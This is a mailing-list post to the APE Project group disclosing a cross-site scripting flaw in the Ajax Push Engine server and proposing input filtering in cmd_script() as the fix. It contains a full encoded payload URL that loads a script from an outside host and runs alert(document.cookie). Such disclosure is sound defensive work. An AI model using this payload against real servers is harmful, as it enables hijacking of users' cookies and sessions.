I managed recently with an issue that allows to inject any js script by preparing link like: http://your.ape.server.domain/?[{%22cmd%22:%22script%22,%22params%22:{%22domain%22:%22any.domain%22,%22scripts%22:[%22http://another.domain.com/your/injected/script.js%5C%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3Cscript+type%3D%5C%22text%2Fjavascript%22]}}]
It allows either attach script from your url or inject script directly such as in this example. The solution for this issue is to filter both params domain and scripts in file src/cmd.c (function: cmd_script()) in ape server. -- You received this message because you are subscribed to the Google Groups "APE Project" group. To post to this group, send email to [email protected] To unsubscribe from this group, send email to [email protected] For more options, visit this group at http://groups.google.com/group/ape-project?hl=en --- APE Project (Ajax Push Engine) Official website : http://www.ape-project.org/ Git Hub : http://github.com/APE-Project/
